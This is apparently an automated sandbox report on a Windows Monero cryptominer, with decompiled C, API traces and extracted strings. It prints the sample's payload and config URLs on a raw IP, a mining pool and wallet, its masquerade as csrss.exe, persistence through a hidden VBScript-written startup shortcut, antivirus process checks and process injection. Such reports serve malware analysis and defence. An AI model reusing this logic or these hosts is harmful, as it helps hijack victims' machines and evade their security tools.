                                                                                                        0x0040499f
                                                                                                        0x004049a1
                                                                                                        0x004049a1
                                                                                                        0x004049a8
                                                                                                        0x00000000
                                                                                                        0x004049a8
                                                                                                        0x004048d4
                                                                                                        0x00404853
                                                                                                        0x004047cd
                                                                                                        0x004046b6
                                                                                                        0x004046b6
                                                                                                        0x004046bc
                                                                                                        0x004046c4
                                                                                                        0x004046d4
                                                                                                        0x004046d9
                                                                                                        0x004046dc
                                                                                                        0x004046e9
                                                                                                        0x004046ee
                                                                                                        0x004046f3
                                                                                                        0x004047d5
                                                                                                        0x004047d5
                                                                                                        0x00404705
                                                                                                        0x00404715
                                                                                                        0x00404726
                                                                                                        0x00404737
                                                                                                        0x0040473c
                                                                                                        0x0040474e
                                                                                                        0x00404754
                                                                                                        0x00404756
                                                                                                        0x00404767
                                                                                                        0x0040476c
                                                                                                        0x0040476f
                                                                                                        0x00404771
                                                                                                        0x00404773
                                                                                                        0x00404778
                                                                                                        0x0040477e
                                                                                                        0x00404783
                                                                                                        0x00404783
                                                                                                        0x00404799
                                                                                                        0x0040479e
                                                                                                        0x004047a3
                                                                                                        0x004047a5
                                                                                                        0x004047b0
                                                                                                        0x004047b5
                                                                                                        0x004047b5
                                                                                                        0x00000000
                                                                                                        0x004047a3
                                                                                                        0x0040475a
                                                                                                        0x0040475a
                                                                                                        0x00404668
                                                                                                        0x0040466a
                                                                                                        0x0040466a
                                                                                                        0x0040465d
                                                                                                        0x00404627
                                                                                                        0x00404627
                                                                                                        0x00404607
                                                                                                        0x00404607
                                                                                                        0x004045e9
                                                                                                        0x004045c9
                                                                                                        0x004045cb
                                                                                                        0x004045cb
                                                                                                        0x004045c7
                                                                                                        0x00404586

APIs
• GetTickCount.KERNEL32 ref: 00404487
• SetErrorMode.KERNELBASE(00000002), ref: 004044E5
• SetErrorMode.KERNELBASE(00000000), ref: 004044EB
• CreateMutexA.KERNELBASE(00000000,00000000,e9c1286a28d82a2d0ee6), ref: 00404506
• ExitProcess.KERNEL32 ref: 00404512
• GetLastError.KERNEL32 ref: 0040451E
• ExitProcess.KERNEL32 ref: 00404529
Strings
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Error$ExitModeProcess$CountCreateLastMutexTick
• String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$taskmgr.exe$viTRMUuKeV$viTRMUuKeV$xmr-us-east1.nanopool.org:14444$xmr-us-east1.nanopool.org:14444
• API String ID: 3615071802-544947428
• Opcode ID: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
• Instruction ID: deaf04295798d6261b51ffebf117c96f993ab97e4c983c13017be75728aacaa1
• Opcode Fuzzy Hash: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
• Instruction Fuzzy Hash: E9F1F7F5E41704B7DB20ABB5AD06B9F36A86B50749F040437FA04B22D2E77C5A44CB6E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00403220(void* __ecx, void* __esi, void* __eflags) {
	intOrPtr _t10;
	intOrPtr _t14;
	void* _t17;
	intOrPtr _t19;
	intOrPtr _t27;
	void* _t31;
	void* _t35;
	long _t37;
	short _t38;
	void* _t41;
	void* _t43;
	struct HINSTANCE__* _t44;
	struct HINSTANCE__* _t46;
	struct HINSTANCE__* _t48;
	struct HINSTANCE__* _t50;
	struct HINSTANCE__* _t52;
	struct HINSTANCE__* _t54;
	intOrPtr _t56;
	struct HINSTANCE__* _t58;
	struct HINSTANCE__* _t60;
	void* _t67;
	void* _t70;
	void* _t73;

	_t67 = __esi;
	_t43 = __ecx;
	// Global configuration block is reset to defaults before the string fields are filled in.
	*0x5d1300 = 0;
	*0x5d1304 = 0;
	*0x5d1308 = 0;
	*0x5d130c = 0;
	*0x5d1310 = 0x7530;
	*0x5d1238 = 0x5f;
	*0x5d12bc = 0x18;
	*0x5d19ac = 0x20;
	*0x5d19b0 = 5;
	*0x5d1318 = 0;
	*0x5d131c = 0;
	*0x5d1320 = 0;
	*0x5d1bb8 = 1;
	*0x5d1bbc = 0xa;
	*0x5d1bc0 = 0;
	*0x5d1c24 = 0;
	*0x5d210c = 1;
	// Helper names below are the decompiler's. From the argument patterns, E00401BB0(buf, 0, n) behaves
	// like a zero-fill (memset-style), E00401640 like a bounded copy and E004017B0 like a string compare;
	// this is an inference from usage, not something the report states. The string literals shown as the
	// first argument are the decompiler's rendering of the destination global buffers' current contents.
	E00401BB0("[no-email]", 0, 0x80);
	E004017E0("[no-email]", "[no-email]");
	E004017E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
	asm("xorps xmm0, xmm0");
	*0x5d1c48 = 0;
	asm("movups [0x5d1c28], xmm0");
	asm("movups [0x5d1c38], xmm0");
	// Install directory (0x208 bytes) and the process name it masquerades as (0x60 bytes).
	E00401BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
	E00401BB0("csrss.exe", 0, 0x60);
	asm("xorps xmm0, xmm0");
	asm("movups [0x5d158c], xmm0");
	asm("movups [0x5d159c], xmm0");
	// Payload download URL and remote configuration URL buffers (0x200 bytes each).
	E00401BB0("http://45.144.225.135/notepad.exe", 0, 0x200);
	E00401BB0(0x5d12c0, 0, 0x40);
	E00401640(0x5d12c0, 0x409df0, 0x40);
	E00401BB0("http://45.144.225.135/config.txt", 0, 0x200);
	_t10 =  *0x5d19ac; // 0x20
	E00401640("http://45.144.225.135/config.txt", 0x409e30, _t10 + 1);
	E00401BB0("FALSE", 0, 0x200);
	_t14 =  *0x5d19b0; // 0x5
	E00401640("FALSE", "FALSE", _t14 + 1);
	// Branch taken when the two configuration strings differ.
	_t17 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
	_t73 = _t70 + 0x90;
	if(_t17 != 0) {
		E00401CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x5d19ac);
		_t41 = E004017B0("FALSE", "FALSE");
                                                                                                        					_t73 = _t73 + 0x18;
                                                                                                        					if(_t41 != 0) {
                                                                                                        						E00401CE0("0125789244697858", 0x10, "FALSE",  *0x5d19b0);
                                                                                                        						_t73 = _t73 + 0x10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t19 = E00408270(_t43, GetCurrentProcess());
                                                                                                        				 *0x5d1314 = _t19;
                                                                                                        				if(_t19 != 0) {
                                                                                                        					E00408DD0();
                                                                                                        					_t60 =  *0x5d1318; // 0x0
                                                                                                        					_t61 =  ==  ? 1 : _t60;
                                                                                                        					 *0x5d1318 =  ==  ? 1 : _t60;
                                                                                                        				}
                                                                                                        				_push(_t67);
                                                                                                        				E004017B0("TRUE", "TRUE");
                                                                                                        				_t44 =  *0x5d1300; // 0x1
                                                                                                        				_t45 =  ==  ? 1 : _t44;
                                                                                                        				 *0x5d1300 =  ==  ? 1 : _t44;
                                                                                                        				E004017B0("TASKMGR", "TASKMGR");
                                                                                                        				_t46 =  *0x5d1304; // 0x1
                                                                                                        				_t47 =  ==  ? 1 : _t46;
                                                                                                        				 *0x5d1304 =  ==  ? 1 : _t46;
                                                                                                        				E004017B0("1THREAD", "50%CPU");
                                                                                                        				_t48 =  *0x5d1308; // 0x2
                                                                                                        				_t49 =  ==  ? 1 : _t48;
                                                                                                        				 *0x5d1308 =  ==  ? 1 : _t48;
                                                                                                        				E004017B0("50%CPU", "50%CPU");
                                                                                                        				_t50 =  *0x5d1308; // 0x2
                                                                                                        				_t51 =  ==  ? 2 : _t50;
                                                                                                        				 *0x5d1308 =  ==  ? 2 : _t50;
                                                                                                        				E004017B0("100%CPU", "50%CPU");
                                                                                                        				_t52 =  *0x5d1308; // 0x2
                                                                                                        				_t53 =  ==  ? 3 : _t52;
                                                                                                        				 *0x5d1308 =  ==  ? 3 : _t52;
                                                                                                        				E004017B0("100%CPU", "100%CPU");
                                                                                                        				_t54 =  *0x5d130c; // 0x1
                                                                                                        				_t55 =  ==  ? 1 : _t54;
                                                                                                        				 *0x5d1bb4 = 0x1e;
                                                                                                        				 *0x5d130c =  ==  ? 1 : _t54;
                                                                                                        				E00401BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0, 0x100);
                                                                                                        				_t27 =  *0x5d1238; // 0x5f
                                                                                                        				E00401640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x409f40, _t27 + 1);
                                                                                                        				E00401CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
                                                                                                        				_t31 = E00401BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
                                                                                                        				E00401BB0("xmr-us-east1.nanopool.org:14444", 0, 0x80);
                                                                                                        				_t56 =  *0x5d12bc; // 0x18
                                                                                                        				E00401640("xmr-us-east1.nanopool.org:14444", 0x40a018, _t56 + 1);
                                                                                                        				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
                                                                                                        				_t35 = E00401BE0("xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
                                                                                                        				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
                                                                                                        					ExitProcess(0x27);
                                                                                                        				}
                                                                                                        				E004018D0("xmr-us-east1.nanopool.org:14444", "nicehash.com");
                                                                                                        				_t58 =  *0x5d131c; // 0x0
                                                                                                        				_t59 =  !=  ? 1 : _t58;
                                                                                                        				 *0x5d131c =  !=  ? 1 : _t58;
                                                                                                        				_t37 = GetModuleFileNameW(0, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200);
                                                                                                        				if(_t37 == 0 || _t37 == 0x200) {
                                                                                                        					_t38 = 0;
                                                                                                        					 *0x5d1c4c = 0;
                                                                                                        					goto L12;
                                                                                                        				} else {
                                                                                                        					_t38 = E00408B20("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "d572da9202196121d952231f26d65d07"); // executed
                                                                                                        					if(_t38 == 0) {
                                                                                                        						L12:
                                                                                                        						 *0x5d1c28 = 0;
                                                                                                        						 *0x5d2110 = 0;
                                                                                                        						return _t38;
                                                                                                        					} else {
                                                                                                        						 *0x5d1c48 = 0;
                                                                                                        						 *0x5d2110 = 0;
                                                                                                        						return _t38;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(75144D40), ref: 00403426
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 0040361D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                        • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$http://45.144.225.135/notepad.exe$nicehash.com$viTRMUuKeV$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 2251294070-2925034580
                                                                                                        • Opcode ID: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                        • Instruction ID: 5c7772c3a6fcc4d75a1d869b2715d40eb421c31df5170a8a8dddbd709ea8cbad
                                                                                                        • Opcode Fuzzy Hash: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                        • Instruction Fuzzy Hash: DA919374781B007AE730AF66AC97F163BA0A760B45F14452FF500762E3D7F968489B8D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004065D0(void* __eflags) {
                                                                                                        				short _v524;
                                                                                                        				short _v1044;
                                                                                                        				short _v1564;
                                                                                                        				char _v2588;
                                                                                                        				char _v3612;
                                                                                                        				char _v4636;
                                                                                                        				void* _t61;
                                                                                                        				void* _t69;
                                                                                                        				void* _t71;
                                                                                                        				void* _t73;
                                                                                                        				void* _t100;
                                                                                                        				void* _t102;
                                                                                                        				void* _t103;
                                                                                                        				void* _t105;
                                                                                                        				void* _t128;
                                                                                                        				void* _t134;
                                                                                                        				void* _t141;
                                                                                                        				void* _t142;
                                                                                                        				void* _t143;
                                                                                                        				void* _t144;
                                                                                                        				void* _t145;
                                                                                                        				void* _t146;
                                                                                                        				void* _t150;
                                                                                                        
                                                                                                        				E00401A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        				E00401970( &_v524, "\\");
                                                                                                        				E00401970( &_v524, "csrss.exe");
                                                                                                        				 *((short*)(_t141 + E00401B40( &_v524) * 2 - 0x210)) = 0;
                                                                                                        				E00401A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        				E00401970( &_v1044, L"\\r.vbs");
                                                                                                        				_t61 = E00407FA0(0,  &_v3612, 0x40aad0, 7); // executed
                                                                                                        				_t143 = _t142 + 0x38;
                                                                                                        				if(_t61 != 0) {
                                                                                                        					E00401970( &_v3612, "\\");
                                                                                                        					E00401970( &_v3612, "viTRMUuKeV");
                                                                                                        					E00401970( &_v3612, L".url");
                                                                                                        					_t69 = E00406340( &_v524); // executed
                                                                                                        					_t144 = _t143 + 0x1c;
                                                                                                        					__eflags = _t69;
                                                                                                        					if(_t69 == 0) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_t71 = E00407EF0("a2guard.exe"); // executed
                                                                                                        						_t145 = _t144 + 4;
                                                                                                        						__eflags = _t71;
                                                                                                        						if(_t71 != 0) {
                                                                                                        							L10:
                                                                                                        							_t73 = E00407ED0( &_v3612);
                                                                                                        							_t146 = _t145 + 4;
                                                                                                        							__eflags = _t73;
                                                                                                        							if(_t73 != 0) {
                                                                                                        								goto L13;
                                                                                                        							} else {
                                                                                                        								E00401A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
                                                                                                        								E00401970( &_v4636,  &_v524);
                                                                                                        								E00401970( &_v4636, L".exe\"");
                                                                                                        								_t100 = E00407AF0( &_v3612,  &_v4636);
                                                                                                        								_t146 = _t146 + 0x20;
                                                                                                        								__eflags = _t100;
                                                                                                        								if(_t100 != 0) {
                                                                                                        									goto L13;
                                                                                                        								} else {
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t102 = E00407EF0("a2service.exe"); // executed
                                                                                                        							_t145 = _t145 + 4;
                                                                                                        							__eflags = _t102;
                                                                                                        							if(_t102 != 0) {
                                                                                                        								goto L10;
                                                                                                        							} else {
                                                                                                        								_t103 = E00407EF0("a2start.exe"); // executed
                                                                                                        								_t145 = _t145 + 4;
                                                                                                        								__eflags = _t103;
                                                                                                        								if(_t103 != 0) {
                                                                                                        									goto L10;
                                                                                                        								} else {
                                                                                                        									_t105 = E00407ED0( &_v3612); // executed
                                                                                                        									_t146 = _t145 + 4;
                                                                                                        									__eflags = _t105;
                                                                                                        									if(_t105 != 0) {
                                                                                                        										L13:
                                                                                                        										E00406990( &_v3612); // executed
                                                                                                        										E00401A00( &_v1564,  &_v524);
                                                                                                        										E00401970( &_v1564, L".exe");
                                                                                                        										DeleteFileW( &_v1564); // executed
                                                                                                        										MoveFileW( &_v524,  &_v1564); // executed
                                                                                                        										E004068E0( &_v1564); // executed
                                                                                                        										DeleteFileW( &_v524); // executed
                                                                                                        										return 1;
                                                                                                        									} else {
                                                                                                        										E00401A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
                                                                                                        										E00401970( &_v2588, L"outFile=\"");
                                                                                                        										E00401970( &_v2588,  &_v3612);
                                                                                                        										E00401970( &_v2588, L"\"\r\n");
                                                                                                        										E00401970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
                                                                                                        										E00401970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
                                                                                                        										E00401970( &_v2588,  &_v524);
                                                                                                        										E00401970( &_v2588, L".exe\"\"\"\r\n");
                                                                                                        										E00401970( &_v2588, L"objFile.Close\r\n");
                                                                                                        										_t128 = E00407AF0( &_v1044,  &_v2588); // executed
                                                                                                        										_t150 = _t146 + 0x50;
                                                                                                        										__eflags = _t128;
                                                                                                        										if(__eflags == 0) {
                                                                                                        											L12:
                                                                                                        											__eflags = 0;
                                                                                                        											return 0;
                                                                                                        										} else {
                                                                                                        											E00406A40(0, __eflags,  &_v1044); // executed
                                                                                                        											Sleep(0xbb8);
                                                                                                        											DeleteFileW( &_v1044); // executed
                                                                                                        											_t134 = E00407ED0( &_v3612); // executed
                                                                                                        											_t146 = _t150 + 8;
                                                                                                        											__eflags = _t134;
                                                                                                        											if(_t134 != 0) {
                                                                                                        												goto L13;
                                                                                                        											} else {
                                                                                                        												return _t134;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                         			}

                                                                                                         Instruction address column for E004065D0 (addresses 0x004065e5 through 0x004068da; per-line alignment with the decompiled C above was lost in extraction)

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                          • Part of subcall function 00407FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                          • Part of subcall function 00407FA0: CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                          • Part of subcall function 00407FA0: FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004067D9
                                                                                                        • DeleteFileW.KERNELBASE(?), ref: 004067E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                        • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                        • API String ID: 976351581-227138989
                                                                                                        • Opcode ID: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                        • Instruction ID: e23f127453d0789cff49e1510112eb27c4226e1f4d3e58430ef8cc7bba816ee8
                                                                                                        • Opcode Fuzzy Hash: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                        • Instruction Fuzzy Hash: B46101B2D4031C66DB50E6A19C46ECB726C5F05348F0408F7B505F2192EA7DEBA58BAA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00406A40(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				WCHAR* _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				char _v612;
                                                                                                        				char _v740;
                                                                                                        				short _v1780;
                                                                                                        				char _v5876;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* _t38;
                                                                                                        				int _t48;
                                                                                                        				void* _t54;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				void* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t66;
                                                                                                        				void* _t67;
                                                                                                        				void* _t68;
                                                                                                        				void* _t70;
                                                                                                        				void* _t71;
                                                                                                        				void* _t76;
                                                                                                        				signed int _t79;
                                                                                                        				void* _t80;
                                                                                                        				void* _t81;
                                                                                                        				void* _t82;
                                                                                                        				void* _t84;
                                                                                                        
                                                                                                        				_t71 = __ecx;
                                                                                                        				E00401BB0( &_v5876, 0, 0x1000);
                                                                                                        				_v8 = 0;
                                                                                                        				E00401BB0( &_v740, 0, 0x288);
                                                                                                        				E00401670( &_v740, 0, 0x288);
                                                                                                        				_t74 = _a4;
                                                                                                        				E00401A00( &_v612, _a4);
                                                                                                         				_t38 = E00407ED0(_a4); // executed -- E00407ED0 wraps GetFileAttributesW (see APIs below): the routine gives up if the script path passed in _a4 does not exist
                                                                                                        				_t82 = _t81 + 0x30;
                                                                                                        				if(_t38 == 0) {
                                                                                                        					return _t38;
                                                                                                        				}
                                                                                                        				_push(_t68);
                                                                                                        				_push(_t76);
                                                                                                        				if(E00408DD0() == 0) {
                                                                                                        					L22:
                                                                                                        					E00401BB0( &_v92, 0, 0x44);
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					asm("movups [ebp-0x14], xmm0");
                                                                                                         				// L22 is the fallback path: build the command line cmd.exe /C WScript "<script path>" and start it hidden
                                                                                                         				E00401A00( &_v1780, L"cmd.exe /C WScript \"");
                                                                                                         				E00401970( &_v1780, _t74);
                                                                                                         				E00401970( &_v1780, "\"");
                                                                                                         				_t48 = E00407ED0(_t74); // executed -- second existence check on the script path before launching it
                                                                                                         				if(_t48 != 0) {
                                                                                                         					CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed -- dwCreationFlags 0x8000000 is CREATE_NO_WINDOW, so the WScript console never appears
                                                                                                        						CloseHandle(_v24.hThread);
                                                                                                        						_t48 = CloseHandle(_v24);
                                                                                                        					}
                                                                                                        					L24:
                                                                                                        					return _t48;
                                                                                                        				}
                                                                                                         				// E00407EF0 walks a Toolhelp32 process snapshot (Process32First/Process32Next, see APIs below) for the named image; a hit on any of the security-product names below selects the L10 path instead of the visible WScript launch
                                                                                                         				_t54 = E00407EF0("bdagent.exe"); // executed
                                                                                                        				_t84 = _t82 + 4;
                                                                                                        				if(_t54 != 0) {
                                                                                                        					L10:
                                                                                                        					_push(0x1000);
                                                                                                        					_push( &_v5876);
                                                                                                        					if( *0x5d1314 == 0) {
                                                                                                        						_push(0);
                                                                                                        						_t48 = E004029E0( &_v740, 0x400000, E004080E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E00406CA0);
                                                                                                        						_t82 = _t84 + 0x24;
                                                                                                        						if(_t48 == 0 || _v8 == 0) {
                                                                                                        							goto L22;
                                                                                                        						} else {
                                                                                                        							goto L24;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(1);
                                                                                                        					_t70 = E004080E0(_t68, _t74, _t76);
                                                                                                        					_t82 = _t84 + 0xc;
                                                                                                        					if(_t70 == 0) {
                                                                                                        						goto L22;
                                                                                                        					}
                                                                                                        					_t79 = 0;
                                                                                                        					if(_t70 == 0) {
                                                                                                        						goto L22;
                                                                                                        					}
                                                                                                         				// walk the PID list returned by E004080E0 (_t70 entries), skipping empty slots and the sample's own PID, and stop at the first target for which E004029E0 succeeds
                                                                                                         				do {
                                                                                                         					if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
                                                                                                        						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t48 = E004029E0(_t71, 0x400000, _t75,  &_v740, 0x288,  &_v8, E00406CA0);
                                                                                                        						_t82 = _t82 + 0x18;
                                                                                                        						if(_t48 != 0 && _v8 != 0) {
                                                                                                        							goto L24;
                                                                                                        						}
                                                                                                        						L18:
                                                                                                        						_t79 = _t79 + 1;
                                                                                                        					} while (_t79 < _t70);
                                                                                                        					_t74 = _a4;
                                                                                                        					goto L22;
                                                                                                        				}
                                                                                                        				_t61 = E00407EF0("vsserv.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t61 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t62 = E00407EF0("cfp.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t62 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t63 = E00407EF0("ccavsrv.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t63 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t64 = E00407EF0("cmdagent.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t64 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t65 = E00407EF0("avp.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t65 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t66 = E00407EF0("avpui.exe"); // executed
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t66 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t67 = E00407EF0("ksde.exe"); // executed
                                                                                                        				_t82 = _t84 + 4;
                                                                                                        				if(_t67 == 0) {
                                                                                                        					goto L22;
                                                                                                        				}
                                                                                                        				goto L10;
                                                                                                         			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406B91
                                                                                                          • Part of subcall function 00407EF0: Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                          • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F48
                                                                                                          • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F6D
                                                                                                          • Part of subcall function 00407EF0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                          • Part of subcall function 00407EF0: CloseHandle.KERNEL32(00000000,00000001,?), ref: 00407F86
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406C7E
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 00406C8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 00406C92
                                                                                                          • Part of subcall function 00407EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$HandleProcess32$CreateNextProcess$AttributesChangeCurrentFileFindFirstNotificationSnapshotToolhelp32
                                                                                                        • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                        • API String ID: 784547097-1880040858
                                                                                                        • Opcode ID: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                        • Instruction ID: e8651156ccd0aa44593a489e188d373cfd9c837c14a664b72568e472e4b0eebb
